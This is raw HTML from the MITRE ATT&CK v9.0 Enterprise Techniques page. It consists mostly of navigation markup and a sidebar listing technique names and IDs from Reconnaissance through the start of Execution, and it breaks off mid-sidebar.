Techniques - Enterprise | MITRE ATT&CK®

<!DOCTYPE html> <html lang='en'> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-62667723-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-62667723-1'); </script> <meta name="google-site-verification" content="2oJKLqNN62z6AOCb0A0IXGtbQuj-lev5YPAHFF_cbHQ"/> <meta charset='utf-8'> <meta name='viewport' content='width=device-width, initial-scale=1, shrink-to-fit=no'> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel='shortcut icon' href="/versions/v9/theme/favicon.ico" type='image/x-icon'> <title>Techniques - Enterprise | MITRE ATT&CK&reg;</title> <!-- Bootstrap CSS --> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap.min.css" /> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap-glyphicon.min.css" /> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap-tourist.css" /> <link rel="stylesheet" type="text/css" href="/versions/v9/theme/style.min.css?426cc53a"> </head> <body> <!--stopindex--> <header> <nav class='navbar navbar-expand-lg navbar-dark fixed-top'> <a class='navbar-brand' href="/versions/v9/"><img src="/versions/v9/theme/images/mitre_attack_logo.png" class="attack-logo"></a> <button class='navbar-toggler' type='button' data-toggle='collapse' data-target='#navbarCollapse' aria-controls='navbarCollapse' aria-expanded='false' aria-label='Toggle navigation'> <span class='navbar-toggler-icon'></span> </button> <div class='collapse navbar-collapse' id='navbarCollapse'> <ul class='nav nav-tabs ml-auto'> <li class="nav-item"> <a href="/versions/v9/matrices/" class="nav-link" ><b>Matrices</b></a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/tactics/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Tactics</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a 
class="dropdown-item" href="/versions/v9/tactics/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/tactics/mobile/">Mobile</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/techniques/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Techniques</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/techniques/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/techniques/mobile/">Mobile</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/mitigations/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Mitigations</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/mitigations/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/mitigations/mobile/">Mobile</a> </div> </li> <li class="nav-item"> <a href="/versions/v9/groups" class="nav-link" ><b>Groups</b></a> </li> <li class="nav-item"> <a href="/versions/v9/software/" class="nav-link" ><b>Software</b></a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/resources/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Resources</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/resources/">General Information</a> <a class="dropdown-item" href="/versions/v9/resources/getting-started/">Getting Started</a> <a class="dropdown-item" href="/versions/v9/resources/training/">Training</a> <a class="dropdown-item" href="/versions/v9/resources/attackcon/">ATT&CKcon</a> <a class="dropdown-item" href="/versions/v9/resources/working-with-attack/">Working with ATT&CK</a> <a 
class="dropdown-item" href="/versions/v9/resources/faq/">FAQ</a> <a class="dropdown-item" href="/resources/updates/">Updates</a> <a class="dropdown-item" href="/resources/versions/">Versions of ATT&CK</a> <a class="dropdown-item" href="/versions/v9/resources/related-projects/">Related Projects</a> </div> </li> <li class="nav-item"> <a href="https://medium.com/mitre-attack/" target="_blank" class="nav-link"> <b>Blog</b>&nbsp; <img src="/versions/v9/theme/images/external-site.svg" alt="External site" class="external-icon" /> </a> </li> <li class="nav-item"> <a href="/versions/v9/resources/contribute/" class="nav-link" ><b>Contribute</b></a> </li> <li class="nav-item"> <button id="search-button" class="btn search-button">Search <div class="search-icon"></div></button> </li> </ul> </div> </nav> </header> <!-- don't edit or remove the line below even though it's commented out, it gets parsed and replaced by the versioning feature --> <div class="container-fluid version-banner"><div class="icon-inline baseline mr-1"><img src="/versions/v9/theme/images/icon-warning-24px.svg"></div>Currently viewing <a href="https://github.com/mitre/cti/releases/tag/ATT%26CK-v9.0" target="_blank">ATT&CK v9.0</a> which was live between April 29, 2021 and October 20, 2021. 
<a href="/resources/versions/">Learn more about the versioning system</a> or <a href="/">see the live site</a>.</div> <div id='content' class="maincontent"> <!--start-indexing-for-search--> <div class='container-fluid h-100'> <div class='row h-100'> <div class="nav flex-column col-xl-2 col-lg-3 col-md-3 sidebar nav pt-5 pb-3 pl-3 border-right" id="v-tab" role="tablist" aria-orientation="vertical"> <!--stop-indexing-for-search--> <div id="v-tab" role="tablist" aria-orientation="vertical"> <span class="heading" id="v-home-tab" aria-selected="false">TECHNIQUES</span> <div class="sidenav"> <div class="sidenav-head active" id="enterprise"> <a href="/versions/v9/techniques/enterprise/"> Enterprise </a> <div class="expand-button collapsed" id="enterprise-header" data-toggle="collapse" data-target="#enterprise-body" aria-expanded="false" aria-controls="#enterprise-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-body" aria-labelledby="enterprise-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043"> <a href="/versions/v9/tactics/TA0043"> Reconnaissance </a> <div class="expand-button collapsed" id="enterprise-TA0043-header" data-toggle="collapse" data-target="#enterprise-TA0043-body" aria-expanded="false" aria-controls="#enterprise-TA0043-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-body" aria-labelledby="enterprise-TA0043-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1595"> <a href="/versions/v9/techniques/T1595/"> Active Scanning </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1595-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1595-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1595-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1595-body" aria-labelledby="enterprise-TA0043-T1595-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1595-T1595.001"> <a 
href="/versions/v9/techniques/T1595/001/"> Scanning IP Blocks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1595-T1595.002"> <a href="/versions/v9/techniques/T1595/002/"> Vulnerability Scanning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1592"> <a href="/versions/v9/techniques/T1592/"> Gather Victim Host Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1592-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1592-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1592-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1592-body" aria-labelledby="enterprise-TA0043-T1592-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.001"> <a href="/versions/v9/techniques/T1592/001/"> Hardware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.002"> <a href="/versions/v9/techniques/T1592/002/"> Software </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.003"> <a href="/versions/v9/techniques/T1592/003/"> Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.004"> <a href="/versions/v9/techniques/T1592/004/"> Client Configurations </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1589"> <a href="/versions/v9/techniques/T1589/"> Gather Victim Identity Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1589-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1589-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1589-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1589-body" aria-labelledby="enterprise-TA0043-T1589-header"> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0043-T1589-T1589.001"> <a href="/versions/v9/techniques/T1589/001/"> Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1589-T1589.002"> <a href="/versions/v9/techniques/T1589/002/"> Email Addresses </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1589-T1589.003"> <a href="/versions/v9/techniques/T1589/003/"> Employee Names </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1590"> <a href="/versions/v9/techniques/T1590/"> Gather Victim Network Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1590-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1590-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1590-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1590-body" aria-labelledby="enterprise-TA0043-T1590-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.001"> <a href="/versions/v9/techniques/T1590/001/"> Domain Properties </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.002"> <a href="/versions/v9/techniques/T1590/002/"> DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.003"> <a href="/versions/v9/techniques/T1590/003/"> Network Trust Dependencies </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.004"> <a href="/versions/v9/techniques/T1590/004/"> Network Topology </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.005"> <a href="/versions/v9/techniques/T1590/005/"> IP Addresses </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.006"> <a href="/versions/v9/techniques/T1590/006/"> Network Security Appliances </a> </div> </div> 
</div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1591"> <a href="/versions/v9/techniques/T1591/"> Gather Victim Org Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1591-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1591-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1591-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1591-body" aria-labelledby="enterprise-TA0043-T1591-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.001"> <a href="/versions/v9/techniques/T1591/001/"> Determine Physical Locations </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.002"> <a href="/versions/v9/techniques/T1591/002/"> Business Relationships </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.003"> <a href="/versions/v9/techniques/T1591/003/"> Identify Business Tempo </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.004"> <a href="/versions/v9/techniques/T1591/004/"> Identify Roles </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1598"> <a href="/versions/v9/techniques/T1598/"> Phishing for Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1598-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1598-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1598-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1598-body" aria-labelledby="enterprise-TA0043-T1598-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.001"> <a href="/versions/v9/techniques/T1598/001/"> Spearphishing Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.002"> <a 
href="/versions/v9/techniques/T1598/002/"> Spearphishing Attachment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.003"> <a href="/versions/v9/techniques/T1598/003/"> Spearphishing Link </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1597"> <a href="/versions/v9/techniques/T1597/"> Search Closed Sources </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1597-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1597-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1597-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1597-body" aria-labelledby="enterprise-TA0043-T1597-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1597-T1597.001"> <a href="/versions/v9/techniques/T1597/001/"> Threat Intel Vendors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1597-T1597.002"> <a href="/versions/v9/techniques/T1597/002/"> Purchase Technical Data </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1596"> <a href="/versions/v9/techniques/T1596/"> Search Open Technical Databases </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1596-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1596-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1596-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1596-body" aria-labelledby="enterprise-TA0043-T1596-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.001"> <a href="/versions/v9/techniques/T1596/001/"> DNS/Passive DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.002"> <a href="/versions/v9/techniques/T1596/002/"> WHOIS </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0043-T1596-T1596.003"> <a href="/versions/v9/techniques/T1596/003/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.004"> <a href="/versions/v9/techniques/T1596/004/"> CDNs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.005"> <a href="/versions/v9/techniques/T1596/005/"> Scan Databases </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1593"> <a href="/versions/v9/techniques/T1593/"> Search Open Websites/Domains </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1593-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1593-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1593-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1593-body" aria-labelledby="enterprise-TA0043-T1593-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1593-T1593.001"> <a href="/versions/v9/techniques/T1593/001/"> Social Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1593-T1593.002"> <a href="/versions/v9/techniques/T1593/002/"> Search Engines </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1594"> <a href="/versions/v9/techniques/T1594/"> Search Victim-Owned Websites </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042"> <a href="/versions/v9/tactics/TA0042"> Resource Development </a> <div class="expand-button collapsed" id="enterprise-TA0042-header" data-toggle="collapse" data-target="#enterprise-TA0042-body" aria-expanded="false" aria-controls="#enterprise-TA0042-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-body" aria-labelledby="enterprise-TA0042-header"> <div class="sidenav"> <div 
class="sidenav-head " id="enterprise-TA0042-T1583"> <a href="/versions/v9/techniques/T1583/"> Acquire Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1583-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1583-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1583-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1583-body" aria-labelledby="enterprise-TA0042-T1583-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.001"> <a href="/versions/v9/techniques/T1583/001/"> Domains </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.002"> <a href="/versions/v9/techniques/T1583/002/"> DNS Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.003"> <a href="/versions/v9/techniques/T1583/003/"> Virtual Private Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.004"> <a href="/versions/v9/techniques/T1583/004/"> Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.005"> <a href="/versions/v9/techniques/T1583/005/"> Botnet </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.006"> <a href="/versions/v9/techniques/T1583/006/"> Web Services </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1586"> <a href="/versions/v9/techniques/T1586/"> Compromise Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1586-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1586-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1586-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1586-body" aria-labelledby="enterprise-TA0042-T1586-header"> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0042-T1586-T1586.001"> <a href="/versions/v9/techniques/T1586/001/"> Social Media Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1586-T1586.002"> <a href="/versions/v9/techniques/T1586/002/"> Email Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1584"> <a href="/versions/v9/techniques/T1584/"> Compromise Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1584-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1584-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1584-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1584-body" aria-labelledby="enterprise-TA0042-T1584-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.001"> <a href="/versions/v9/techniques/T1584/001/"> Domains </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.002"> <a href="/versions/v9/techniques/T1584/002/"> DNS Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.003"> <a href="/versions/v9/techniques/T1584/003/"> Virtual Private Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.004"> <a href="/versions/v9/techniques/T1584/004/"> Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.005"> <a href="/versions/v9/techniques/T1584/005/"> Botnet </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.006"> <a href="/versions/v9/techniques/T1584/006/"> Web Services </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1587"> <a href="/versions/v9/techniques/T1587/"> Develop Capabilities </a> <div class="expand-button collapsed" 
id="enterprise-TA0042-T1587-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1587-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1587-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1587-body" aria-labelledby="enterprise-TA0042-T1587-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.001"> <a href="/versions/v9/techniques/T1587/001/"> Malware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.002"> <a href="/versions/v9/techniques/T1587/002/"> Code Signing Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.003"> <a href="/versions/v9/techniques/T1587/003/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.004"> <a href="/versions/v9/techniques/T1587/004/"> Exploits </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1585"> <a href="/versions/v9/techniques/T1585/"> Establish Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1585-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1585-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1585-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1585-body" aria-labelledby="enterprise-TA0042-T1585-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1585-T1585.001"> <a href="/versions/v9/techniques/T1585/001/"> Social Media Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1585-T1585.002"> <a href="/versions/v9/techniques/T1585/002/"> Email Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1588"> <a href="/versions/v9/techniques/T1588/"> Obtain Capabilities </a> <div 
class="expand-button collapsed" id="enterprise-TA0042-T1588-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1588-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1588-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1588-body" aria-labelledby="enterprise-TA0042-T1588-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.001"> <a href="/versions/v9/techniques/T1588/001/"> Malware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.002"> <a href="/versions/v9/techniques/T1588/002/"> Tool </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.003"> <a href="/versions/v9/techniques/T1588/003/"> Code Signing Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.004"> <a href="/versions/v9/techniques/T1588/004/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.005"> <a href="/versions/v9/techniques/T1588/005/"> Exploits </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.006"> <a href="/versions/v9/techniques/T1588/006/"> Vulnerabilities </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1608"> <a href="/versions/v9/techniques/T1608/"> Stage Capabilities </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1608-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1608-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1608-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1608-body" aria-labelledby="enterprise-TA0042-T1608-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.001"> <a href="/versions/v9/techniques/T1608/001/"> Upload Malware </a> </div> 
</div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.002"> <a href="/versions/v9/techniques/T1608/002/"> Upload Tool </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.003"> <a href="/versions/v9/techniques/T1608/003/"> Install Digital Certificate </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.004"> <a href="/versions/v9/techniques/T1608/004/"> Drive-by Target </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.005"> <a href="/versions/v9/techniques/T1608/005/"> Link Target </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001"> <a href="/versions/v9/tactics/TA0001"> Initial Access </a> <div class="expand-button collapsed" id="enterprise-TA0001-header" data-toggle="collapse" data-target="#enterprise-TA0001-body" aria-expanded="false" aria-controls="#enterprise-TA0001-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-body" aria-labelledby="enterprise-TA0001-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1189"> <a href="/versions/v9/techniques/T1189/"> Drive-by Compromise </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1190"> <a href="/versions/v9/techniques/T1190/"> Exploit Public-Facing Application </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1133"> <a href="/versions/v9/techniques/T1133/"> External Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1200"> <a href="/versions/v9/techniques/T1200/"> Hardware Additions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1566"> <a href="/versions/v9/techniques/T1566/"> Phishing </a> <div class="expand-button collapsed" 
id="enterprise-TA0001-T1566-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1566-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1566-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1566-body" aria-labelledby="enterprise-TA0001-T1566-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.001"> <a href="/versions/v9/techniques/T1566/001/"> Spearphishing Attachment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.002"> <a href="/versions/v9/techniques/T1566/002/"> Spearphishing Link </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.003"> <a href="/versions/v9/techniques/T1566/003/"> Spearphishing via Service </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1091"> <a href="/versions/v9/techniques/T1091/"> Replication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1195"> <a href="/versions/v9/techniques/T1195/"> Supply Chain Compromise </a> <div class="expand-button collapsed" id="enterprise-TA0001-T1195-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1195-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1195-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1195-body" aria-labelledby="enterprise-TA0001-T1195-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.001"> <a href="/versions/v9/techniques/T1195/001/"> Compromise Software Dependencies and Development Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.002"> <a href="/versions/v9/techniques/T1195/002/"> Compromise Software Supply Chain </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.003"> <a 
href="/versions/v9/techniques/T1195/003/"> Compromise Hardware Supply Chain </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1199"> <a href="/versions/v9/techniques/T1199/"> Trusted Relationship </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0001-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1078-body" aria-labelledby="enterprise-TA0001-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002"> <a href="/versions/v9/tactics/TA0002"> Execution </a> <div class="expand-button collapsed" id="enterprise-TA0002-header" data-toggle="collapse" data-target="#enterprise-TA0002-body" aria-expanded="false" aria-controls="#enterprise-TA0002-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-body" aria-labelledby="enterprise-TA0002-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1059"> <a 
